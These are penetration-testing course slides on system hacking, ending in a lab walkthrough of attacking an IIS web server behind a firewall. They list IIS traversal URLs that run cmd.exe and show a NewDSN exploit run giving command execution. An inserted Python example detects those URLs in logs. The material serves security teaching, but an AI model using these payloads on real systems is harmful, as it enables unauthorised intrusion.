System Hacking
Section 4
7/21/2015
Outline
• Service identification
• Vulnerability identification and research
• Exploits
• Putting it all together
• Target selection in large networks
• Using automated tools
Service Identification
Section 4.1
Service Identification
• Common ports
• Banners
• Fingerprinting
Connecting to ports
• Telnet or netcat is the best way to connect to ports
• Many services may be accessed directly
Common ports
Many services can be identified by their common port numbers
Zone-h.org
Alldas.de
Banners
Some services may be better identified by their banners:
• telnet on routers (ports 2001, 4001, 6001)
• Web daemons for applications
– Compaq Insight Manager
– Many systems include web configuration interfaces
Fingerprinting
Some services cannot be clearly identified just by connecting to them:
• Netbus on NT uses the same port as an RPC service on Solaris
• Some database connections do not provide an automatic response
Fingerprinting a service may identify what it is, even if it has moved ports
Vulnerability Research
Section 4.2
Vulnerability identification and research
• This is the process of mapping identified security attributes of a system or application to potential vulnerabilities
Several methods to map vulnerabilities:
1. Manually map identified systems against publicly available databases such as www.securityfocus.com, www.cert.org and vendor security alerts
2. Use public exploit code posted to various security mailing lists and hacker websites, or write your own code
3. Use automated vulnerability scanning tools such as Nessus, ISS or whisker
Lab
• Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified.
– www.securityfocus.com
– General searches on google.com
– www.packetstormsecurity.com
– www.astalavista.box.sk
– www.securiteam.com
Time: 30 minutes
Exploits
Section 4.3
Types of exploits
• Remote exploits
• Trojans
• Privilege escalation
Remote Exploits
Section 4.3.1
Remote exploits
A ‘remote exploit’ attempts to gain access across the network without proper authentication.
Examples:
• Brute force authentication attempts
• Attacks bypassing integrity checkers
• Buffer overflows
• Sniffing (to some extent)
Brute force attacks
Most common services attacked:
1. Telnet
2. FTP
3. “R” commands
4. Secure Shell
5. SNMP community names
6. Post Office Protocol (POP)
7. HyperText Transfer Protocol (HTTP/HTTPS)
8. SMB
Common tools used
• Brutus
• Admsnmp
• Admsmb
• TeeNet
• Pwscan.pl
• Thc_hydra
Remote password guessing
• Attempting to connect to an enumerated share (such as ADMIN$ or C$) and trying username/password combinations until one works
• A “null session” can be established with the target to obtain valid account names
• Use an automated password guessing tool to brute force the selected shares
Brute force attacks under Windows
• Some common services prone to brute force:
– Web
– Netbios
– FTP
Legion
Brute force attacks under Unix
• Some common services prone to brute force:
– telnet
– ssh
– Web
– FTP
– R-commands
Lab
• Use a Netbios scanning tool to identify local shares on this network
• Use a brute force tool to attempt access to an account on 10.0.1.120
• Warning! These tools can produce significant traffic and lock accounts.
Time: 30 minutes
Buffer overflow attacks
FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE
• Stack overflows
• Format string overflows
• Heap overflows
• Overflows subverting the control path
Buffer overflow attacks
• Occur when a user or process attempts to place more data into a buffer than was originally allocated
• Commonly associated with C functions like strcpy(), strcat(), sprintf(), etc.
• Most frequently found when user input is taken and passed into an application
Windows buffer overflows
• Only a few conditions have been revealed to date
• All of them exploited flaws in application programs
• Very common for DoS attacks
Exploits
1. Netmeeting 2.x by Cult of the Dead Cow
2. NT RAS by Cerberus Information Security
3. Winhlp32 by Cerberus Information Security
4. IISHack by eEye
5. Oracle Web Listener 4.0 by CIS
6. Outlook GMT token overrun by Underground Security Systems Research
7. IIS .printer
Unix buffer overflows
• Sadmind
• ftp
• ssh
• nfs
Unexpected input
• Bypassing integrity checks
• Gaining access by providing unexpected input
– IIS unicode
– Web applications
Format string attacks
• Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf()
• Efforts usually focused on SUID root programs
Input validation attacks
• Occur when a program fails to recognise syntactically incorrect input
• Occur when a module accepts extraneous input
• Occur when a module fails to handle missing input fields
• Occur when a field-value correlation error arises
• Common in web applications
IIS vulnerabilities
• Unicode and URL based attacks
• Special tags in HTTP
• Sample scripts to brute force
IIS hacking
• /scripts/root.exe?/c+dir
• /MSADC/root.exe?/c+dir
• /c/winnt/system32/cmd.exe?/c+dir
• /d/winnt/system32/cmd.exe?/c+dir
• /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
• /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
• /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
• /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
• /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
• /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
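As an added example for log review (not code from the original slides), the Python below reproduces the lenient URL decoding that let the requests above reach cmd.exe (a second %-decoding pass and overlong two-byte UTF-8 sequences), canonicalises each request path, and flags the traversal and command-shell patterns in sample web-server request lines. The request lines, the function names and the "climbed above the web root" heuristic are the example's own assumptions.

```python
import re
# Added example, not the slides' own code. The two decoders mimic the faulty IIS
# behaviour the URL list above relies on, so that every encoding variant of
# "..\" resolves to the same canonical path a reviewer can match on.
PCT_ESCAPE = re.compile(rb"%([0-9A-Fa-f]{2})")
OVERLONG_PAIR = re.compile(rb"[\xc0\xc1](.)", re.DOTALL)  # 2-byte lead + any trailer
SUSPECT_EXECUTABLES = {"cmd.exe", "root.exe"}
SAMPLE_LOG = [  # constructed request lines, not captured traffic
    "GET /default.asp HTTP/1.0",
    "GET /docs/my%20file.htm HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
]

def percent_decode_once(data: bytes) -> bytes:
    """One %XX pass; malformed escapes such as '%%35' stay literal for the next pass."""
    return PCT_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def decode_overlong_utf8(data: bytes) -> bytes:
    """Decode 0xC0/0xC1 pairs to one ASCII byte as the faulty decoder did:
    %c0%af -> '/', %c1%9c and even %c1%1c (invalid trailer) -> '\\'."""
    return OVERLONG_PAIR.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)]), data)

def canonicalize(path: bytes) -> tuple[str, bool]:
    """Fully decoded, dot-segment-free path, plus whether '..' climbed above the web root."""
    text = decode_overlong_utf8(percent_decode_once(percent_decode_once(path)))
    segments, escaped = [], False
    for seg in text.decode("latin-1").replace("\\", "/").split("/"):
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escaped = True
        elif seg not in ("", "."):
            segments.append(seg)
    return "/" + "/".join(segments), escaped

def analyse_request(uri: str) -> list[str]:
    """Reasons this URI matches the IIS patterns above; an empty list means it looks clean."""
    path = uri.partition("?")[0].encode("latin-1")
    canonical, escaped = canonicalize(path)
    once = percent_decode_once(path)  # what a correct single-pass decoder would see
    checks = [
        (escaped, "traversal above web root"),
        (canonical.rsplit("/", 1)[-1].lower() in SUSPECT_EXECUTABLES, "command shell requested"),
        (decode_overlong_utf8(percent_decode_once(once)) != once, "double or overlong encoding"),
    ]
    return [reason for hit, reason in checks if hit]

def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """(uri, reasons) for every 'METHOD URI HTTP/x' request line that trips a check."""
    results = [(line.split()[1], analyse_request(line.split()[1])) for line in lines]
    return [(uri, reasons) for uri, reasons in results if reasons]
```

Running scan_log(SAMPLE_LOG) flags the three attack lines and leaves the plain and legitimately %-encoded requests alone; the same canonical path is produced for every variant in the list above.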
Lab
• Use the provided URLs to roam the filesystem of 10.0.1.120
• What is accessible and what is not?
Time: 10 minutes
Trojan Horses and Backdoors
Section 4.3.2
Windows trojans and backdoors
These programs provide unauthorised access to a system without the user’s knowledge:
• Theef
• CDC BackOrifice
• SubSeven
• Moosucker
A great site: http://www.tlsecurity.net
Tlsecurity.net
Privilege Escalation
Section 4.3.3
Privilege escalation
• Attack used to move from normal user to superuser
• Quest for Administrator
• Quest for root
Quest for Administrator
• Hoovering information
• Getadmin
• Sechole
• Spoofing LPC Port requests
Hoovering information
• Identify further information that will gain higher privileges
• Srvinfo
• Find utility
• regdmp
Getadmin
• Windows NT 4
• Small program written by Konstantin Sobolev
• Adds users to the local admin group
• Hijacks a process called winlogon
• Patched by NT SP3
Sechole
• Similar functionality to getadmin
• Modifies instructions in the memory of the OpenProcess API
• Possible to launch remotely if IIS is running
• Patched by NT SP6a
Spoofing LPC Port Requests
• Vulnerability identified by The RAZOR Team at http://razor.bindview.com
• The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API
Quest for root
• Local buffer overflow
• Symlink
• File descriptor attacks
• Signal handling
• Core-file manipulation
• Shared libraries
• Kernel flaws
• System misconfiguration
• IFS attacks
Local buffer overflow
• Mostly used to exploit SUID root programs
• May add a username to the password file
Sniffing
Section 4.3.4
Sniffing
• Sniffing works by setting a network card to ‘promiscuous mode’
• Sniffing only works on traffic travelling across the local network
• Sniffing is greatly complicated by network switches
Windows password sniffing
• Can use any ordinary packet analyser
• Or use a specialised tool such as l0phtcrack
• Some susceptible services:
– Netbios
– FTP
– Web (especially cookies)
Unix password sniffing
• Can use any ordinary packet analyser
• But Unix has some great sniffers such as dsniff
• Many Unix programs send passwords in clear text
• Some susceptible services:
– Telnet
– FTP
– Web
dsniff
• Netbios
• ftp
• telnet
• R-commands
• http
• Instant messaging
• And much, much more!
NT services
Section 4.4
Common NT services
Profile: Netbios
• Ports 135-139
• Susceptible to sniffing, brute force
• Scanners available to search for shares
• Can give access to the system registry
• Normally blocked at routers due to broadcast
Profile: Web
• Port: 80, or any for special apps
• Common servers: Apache, Oracle, IIS, Cold Fusion
• Very susceptible to DoS attacks
• Often give read access to all files
• IIS vulnerabilities are legendary
Profile: SMTP
• Port: 25
• Very susceptible to mail relay
• Not a lot else
Profile: FTP
• Port: 21
• Part of IIS distribution
• Some vulnerabilities but not a large target
Profile: databases
• Ports: 1433, 1510, 1725
• MSSQL is a good internal network target
• MS and Oracle often set up with default passwords
• “SQL injection” a favourite for web hackers
Unix services
Section 4.5
Profile: SNMP
• Ports: 160, 161 UDP
• SNMP has two default passwords: public, private
• Tools such as snmpwalk are good for enumerating entries
Profile: TFTP
• Port: 69
• Typically used to boot diskless workstations or network devices such as routers
• No username or password
• Good for sending around files from hacked systems
Profile: FTP
• Ports: 20, 21
• Allows upload and download of files from a remote system
• Many ftp servers allow anonymous access
• May be vulnerable to buffer overflow
• Can also be used for bounce attacks
Profile: Sendmail
• Port: 25
• Mail transfer agent used on many Unix systems
• Can be used to identify accounts via the vrfy and expn commands
• Some versions susceptible to denial of service and buffer overflows
• Long list of vulnerabilities
Profile: RPC
• Remote Procedure Call
• Allows a program on one computer to execute code on a remote system
Profile: Web
• Port: 80
• Apache is most common
• Not as many attacks as IIS
• Always check URLs for embedded commands
Identifying targets in large networks
Section 4.6
Target selection
• Scan for specific services
– Database (MS, Oracle, Sybase)
– Web
– RPC
– R-commands
• View Netbios browse lists to make your way to the PDC/server
• View Netbios browse lists to identify treasury, etc.
Automated vulnerability scanning tools
Section 4.8
Example automated applications
• Grinder
• SiteScan
• Whisker
• Twwscan
• Nessus
• Elza – scriptable web client
whisker
Nessus
Conclusion
• Hackers often search for specific known vulnerabilities and avoid well-secured systems
• Free tools make it simple to gain unauthorised access to some systems
• Tools such as Nessus should be used by every security professional
Putting it all together
Section 4.7
Our configuration for today
For the purpose of the presentation, we will not perform our tests over the internet.
But we won’t cheat by cutting out the firewall.
Network diagram labels: Internet; 10.0.0.1; Router; Firewall (10.0.0.125 / 10.0.1.125); Webserver (External=10.0.0.120, Internal=10.0.1.120, TCP 80 only)
Network Penetration Tests
Identifying the firewall
Strategy
• Identify the Web or Mail server
• Get the next hop before this
– This will probably be the perimeter router or the firewall
– Firewall 1 & NetScreen appear as a hop
– PIX does not appear as a hop (flattens the network)
– 80% chance that it will be NetScreen, PIX or Firewall 1
• To figure out which:
– ICMP (i.e. Address Mask Request / Response headers)
– Use TCP stack fingerprinting
– Key ports (258, 259 + 263 could be Firewall 1)
– IPSEC
BUT luckily these days the tools are pre-written
Identifying the Firewall – Traceroute
[root@wireless root]# traceroute 10.0.0.120
traceroute to 10.0.0.120 (10.0.0.120), 30 hops max, 38 byte packets
 1  * * *
 2  * *
Slide note: UDP being blocked; need another tool
Identifying the Firewall – LFT
# lft -vv -E -n 10.0.0.120
Looks like we made it.
Everyone responded.
Will finish TWO TTL
Moving on...
Concluding with 2 hops.
LFT trace to 10.0.0.120:80/tcp
**[4.2 BSD bug]next gateway may errantly reply with reused TTLs
**[4.2 BSD bug]next gateway may errantly reply with reused TTLs
 1 [target] 10.0.0.120:80 6.5ms
 2 [target] 10.0.0.120:80 1.6ms
Slide note: suggests something between us, a firewall perhaps. Could also use MPTraceroute.
Accessible hosts – sweep for the firewall
# nmap -sP -n 10.0.0.*
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host (10.0.0.120) appears to be up.
Host (10.0.0.121) appears to be down.
Host (10.0.0.122) appears to be down.
Host (10.0.0.123) appears to be down.
Host (10.0.0.124) appears to be down.
Host (10.0.0.125) appears to be up.
Host (10.0.0.255) appears to be down.
Nmap run completed -- 256 IP addresses (2 hosts up) scanned in 35 seconds
Slide notes: 10.0.0.120 is our web server; who’s this at 10.0.0.125?
Identifying the perimeter – ike-scan
# ike-scan -v 10.0.0.125
Starting ike-scan 1.6 with 1 hosts
--- Pass 1 of 3 completed
--- Pass 2 of 3 completed
--- Pass 3 of 3 completed
Ending ike-scan 1.6: 1 hosts scanned in 22.595 seconds (0.04 hosts/sec). 0 returned handshake; 0 returned notify
Identifying the Firewall – conclusion
# ping 10.0.0.120
PING 10.0.0.120 : 56(84) bytes of data.
64 bytes from 10.0.0.120: icmp_seq=1 ttl=128 time=0.280 ms
--- 10.0.0.120 ping statistics ---
2 packets transmitted, 2 received, 0% loss
Slide note: ttl=128, Windows !!
# ping -v -R 10.0.0.120
PING 10.0.0.120 : 56(124) bytes of data.
--- 10.0.0.120 ping statistics ---
6 packets transmitted, 0 received, 100% loss
Slide note: with low level packet inspection? I think not!!
Identifying the Firewall – ICMP processing
# ping -v -T tsandaddr 10.0.0.120
PING 10.0.0.120 (10.0.0.120) from 10.0.0.1 : 56(124) bytes of data.
--- 10.0.0.120 ping statistics ---
16 packets transmitted, 0 received, 100% loss
# ping -v -T tsandaddr 10.0.0.125
PING 10.0.0.125 (10.0.0.125) from 10.0.0.1 : 56(124) bytes of data.
--- 10.0.0.125 ping statistics ---
8 packets transmitted, 0 received, 100% loss
Identifying the Firewall – Conclusion
• We suspect there is a firewall
– We know the web server is Windows
– But Windows is not normally capable of manipulating packets to this extent
– We are fairly sure that it isn’t Firewall 1
Let’s see if we can hack into the servers
Hacking the other address 10.0.0.125
Scanning 10.0.0.125
# nmap -sS -n -p 1-10000 10.0.0.125
Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
All 10000 scanned ports on 10.0.0.125 are: filtered
Nmap run completed -- 1 IP address (1 host up)
# nmap -sU -n -p 1-10000 10.0.0.125
Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
All 10000 scanned ports on 10.0.0.125 are: filtered
Nmap run completed -- 1 IP address (1 host up)
Slide note: nothing to hack
Hacking the web server
Hacking the web server
– Scan TCP ports
– Scan UDP ports
!!! Only HTTP or HTTPS ports should be visible
– Run a CGI scanner (i.e. Whisker, Crazymad or Nikto) to look for web server exploits
– Check the scanner results
– Identify exploits
Hacking the web server – scan UDP ports
# nmap -sU -n -p 1-10000 10.0.0.120
Starting nmap 3.48
All 10000 scanned ports on 10.0.0.120 are: filtered
Nmap run completed -- 1 IP address (1 host up) scanned in 623.296 seconds
Slide note: nothing to hack
Hacking the web server – scan TCP ports
# nmap -sS -n -O -p 1-1024 10.0.0.120
Interesting ports on 10.0.0.120:
(The 1023 ports scanned but are filtered)
PORT   STATE SERVICE
80/tcp open  http
Running (JUST GUESSING) : Cisco pix os 6.X (88%)
Aggressive OS guesses: Cisco PIX 501 running 6.x
No exact OS matches for host.
Slide notes: HTTP, the only port to hack; now we know.
Hacking the web server – run CGI scanner
# ./whisker.pl -h 10.0.0.120
-- whisker / v1.4.0 / rain forest puppy --
= Host: 10.0.0.120
= Server: Microsoft-IIS/4.0
+ 200 OK (IDC error): GET /scripts/samples/details.idc
+ 200 OK (IDC error): GET /scripts/samples/ctguestb.idc
+ 200 OK: HEAD /scripts/tools/newdsn.exe
- this can be used to make DSNs, useful in use with our ODBC exploit
- and the RDS exploit (with msadcs.dll)
[root@wireless v1.4]# exit
Hacking the web server – analysing CGI scanner results
Run exploit identified by scanner
# dsnhackII.pl -c -h 10.0.0.120
NewDSN exploit v 1.3 -- Scrippie / Phreak.nl
* [Checking for necessary files] *
Checking for: newdsn.exe
-- Found :)
Checking for: ctguestb.idc
-- Found :)
Checking for: details.idc
-- Found :)
* Now trying to create "Web SQL" DSN... <success> *
Initializing GuestBook by GETting ctguestb.idc
Type the command line you want to run (cmd /c assumed):
cmd /c dir >> ..\hamster
* Now trying to execute command... <success> *
[root@wireless root]#
Lab
• Attack the systems provided and attempt to get command line access to NT
Time: 45 minutes